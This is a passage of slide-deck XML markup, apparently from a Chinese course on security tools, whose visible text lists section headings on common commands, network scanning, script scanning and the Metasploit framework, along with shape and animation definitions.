            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="平行四边形 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="1647579"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="组合 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="3433872"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>.3 脚本扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="平行四边形 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="2341731"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5502297" y="4359409"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="3035884"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623073" y="3097846"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="平行四边形 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="3035884"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
